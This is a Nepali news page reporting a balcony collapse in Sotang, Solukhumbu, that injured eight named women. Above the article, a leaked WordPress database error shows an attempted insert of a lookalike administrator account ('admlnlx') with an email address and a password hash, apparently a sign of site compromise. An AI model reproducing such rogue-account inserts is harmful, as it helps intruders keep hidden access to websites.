WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUT425.j5gk5Ho.1MPKpl3ELz3Z8Cf.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 01:49:16', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सोलुखुम्बुको सोताङमा बरन्डा भाचिएर ८ जना घाइते भएका छन ।
सोलुखुम्बु जिल्लाको सोताङ गाउपालिका ५ स्थित लालिगुरास महिला सहकारी सस्थाको बैठकमा उपस्थित हुने क्रममा बरन्डा भाचिएको हो ।
बरन्डा भाचिएर दर्जनौ महिलाहरु भुइमा पछारिएको स्थानिय गोबिन्द नाछिरिङले जानकारी दिए । सोताङ हस्पिटलमा प्राथमिक उपचार पछि थप उपचारको लागि हेलिकप्टर मार्फत काठमाडौ लगिएको नाछिरिङले बताए ।
सबिना राई, पार्वता बस्नेत, हरि माया बस्नेत ,निरु गौतम , राधा बस्नेत, मन कुमारी कार्कि र सिता बस्नेत घाइते हुन पुगेका छन ।